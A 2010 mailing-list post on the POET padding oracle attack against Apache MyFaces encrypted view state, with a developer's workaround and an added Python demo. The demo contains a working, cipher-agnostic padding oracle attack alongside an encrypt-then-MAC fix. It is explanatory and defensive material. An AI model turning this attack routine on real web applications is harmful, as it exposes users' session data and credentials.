On 08.06.10 03:07, Andre Gironda wrote:
Researchers release point-and-click website exploitation tool --
http://www.theregister.co.uk/2010/06/08/padding_oracle_attack_tool/
Watch POET vs Apache MyFaces -- http://www.youtube.com/watch?v=euujmKDxmC4
Research: Padding Oracle Exploit Tool -- http://netifera.com/research/
Released Monday, Poet exploits a well-known vulnerability in the way
many websites encrypt text stored in cookies, hidden HTML fields and
request parameters. The text is designed to help servers keep track of
purchases, user preferences and other settings while at the same time
ensuring account credentials and other sensitive data can't be
intercepted. By modifying the encrypted information and sending it
back to the server, the attackers can recover the plaintext for small
chunks of the data, allowing them to access passwords and restricted
parts of a webserver.
The fatal flaw making exploitation possible is the failure of
JavaServer Faces to implement AES/DES encryption algorithms correctly.
The scheme provides no way to sign the ciphertext or authenticate the
block cipher mode.
Hello, I am not an official voice on this, but as far as I can gather, a
quick workaround to the problem is to use server-side state saving
instead of client-side state saving. We are working actively on a fix
for this problem in the next sub-releases, which will also fix it
for client-side state saving.
(Please correct me if I am wrong on the quick fix.)
Cheers
Werner
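Added illustration of the flaw the quoted article describes, not part of the thread and not MyFaces code: an unauthenticated CBC ciphertext whose server leaks "padding valid?" is decrypted byte by byte, and the same attack fails once an HMAC tag is checked before decryption (encrypt-then-MAC). A tiny keyed Feistel permutation stands in for AES/DES so the script needs only the standard library; the attack never looks inside the block cipher, so it is the same against a real one. The keys, the sample view-state string and the helper names are constructed for the demo.

```python
import hashlib
import hmac
import os

BLOCK = 16

def _xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))

def toy_block(key: bytes, block: bytes, decrypt: bool = False) -> bytes:
    """4-round Feistel permutation standing in for AES/DES (toy, NOT secure)."""
    f = lambda half, i: hmac.new(key, bytes([i]) + half, hashlib.sha256).digest()[:8]
    l, r = block[:8], block[8:]
    for i in (range(3, -1, -1) if decrypt else range(4)):
        l, r = (_xor(r, f(l, i)), l) if decrypt else (r, _xor(l, f(r, i)))
    return l + r

def pkcs7_unpad(data: bytes) -> bytes:
    n = data[-1] if data else 0
    if n < 1 or n > BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")  # the distinguishable failure that forms the oracle
    return data[:-n]

def cbc_encrypt(key: bytes, plaintext: bytes) -> bytes:
    n = BLOCK - len(plaintext) % BLOCK
    padded, out = plaintext + bytes([n]) * n, [os.urandom(BLOCK)]  # PKCS#7 pad, random IV
    for i in range(0, len(padded), BLOCK):
        out.append(toy_block(key, _xor(padded[i:i + BLOCK], out[-1])))
    return b"".join(out)  # IV || C1 || C2 || ...

def cbc_decrypt(key: bytes, ct: bytes) -> bytes:
    blocks = [ct[i:i + BLOCK] for i in range(0, len(ct), BLOCK)]
    pt = b"".join(_xor(toy_block(key, c, True), p) for p, c in zip(blocks, blocks[1:]))
    return pkcs7_unpad(pt)

def padding_oracle_attack(oracle, ct: bytes) -> bytes:
    """Recover the plaintext given only oracle(ct) -> bool ('did the padding check pass?')."""
    blocks = [ct[i:i + BLOCK] for i in range(0, len(ct), BLOCK)]
    recovered = b""
    for prev, cur in zip(blocks, blocks[1:]):
        inter = bytearray(BLOCK)  # D_k(cur), recovered one byte at a time from the right
        for pos in range(BLOCK - 1, -1, -1):
            pad = BLOCK - pos  # force bytes pos..15 of the decrypted block to this value
            forged = bytearray(_xor(inter, bytes([pad]) * BLOCK))  # known bytes already set
            for guess in range(256):
                forged[pos] = guess
                if not oracle(bytes(forged) + cur):
                    continue
                if pos == BLOCK - 1:  # rule out an accidental "02 02" (or longer) match
                    forged[pos - 1] ^= 1
                    ok = oracle(bytes(forged) + cur)
                    forged[pos - 1] ^= 1
                    if not ok:
                        continue
                inter[pos] = guess ^ pad
                break
            else:
                raise RuntimeError("no byte accepted: the server is not a padding oracle")
        recovered += _xor(inter, prev)  # P_i = D_k(C_i) XOR C_(i-1)
    return pkcs7_unpad(recovered)

def seal(enc_key: bytes, mac_key: bytes, plaintext: bytes) -> bytes:
    """Encrypt-then-MAC: the HMAC tag covers the IV and every ciphertext block."""
    ct = cbc_encrypt(enc_key, plaintext)
    return ct + hmac.new(mac_key, ct, hashlib.sha256).digest()

def unseal(enc_key: bytes, mac_key: bytes, token: bytes) -> bytes:
    ct, tag = token[:-32], token[-32:]
    if not hmac.compare_digest(hmac.new(mac_key, ct, hashlib.sha256).digest(), tag):
        raise ValueError("bad tag")  # rejected before any decryption or unpadding happens
    return cbc_decrypt(enc_key, ct)

def accepts(check):
    """Wrap a server-side decrypt into the yes/no signal an attacker can observe."""
    def oracle(ct: bytes) -> bool:
        try:
            check(ct)
            return True
        except ValueError:
            return False
    return oracle

# Constructed sample keys and view state for the demo; nothing here is from a real deployment.
ENC_KEY, MAC_KEY = b"constructed-enc-key", b"constructed-mac-key"
SAMPLE_STATE = b"viewId=/checkout.xhtml;user=alice;role=customer"

def demo_attack() -> bytes:
    ct = cbc_encrypt(ENC_KEY, SAMPLE_STATE)  # unauthenticated, as in the vulnerable scheme
    return padding_oracle_attack(accepts(lambda c: cbc_decrypt(ENC_KEY, c)), ct)

def demo_fix() -> bool:
    token = seal(ENC_KEY, MAC_KEY, SAMPLE_STATE)
    oracle = accepts(lambda c: unseal(ENC_KEY, MAC_KEY, c + token[-32:]))  # replays real tag
    try:
        padding_oracle_attack(oracle, token[:-32])
        return False
    except RuntimeError:
        return True  # every altered ciphertext fails the tag check, so nothing leaks
```

demo_attack() returns SAMPLE_STATE without ever seeing the key: each byte costs at most 256 requests, and the only thing the server gives away is whether unpadding succeeded, which in practice can be a distinct error page, status code or response time. demo_fix() shows why "sign the ciphertext" closes the hole: the tag is verified over IV and ciphertext before anything is decrypted, so every forged block is rejected identically and the oracle disappears. The interim switch Werner mentions corresponds to setting the javax.faces.STATE_SAVING_METHOD context parameter to server in web.xml, so that no encrypted state reaches the client at all.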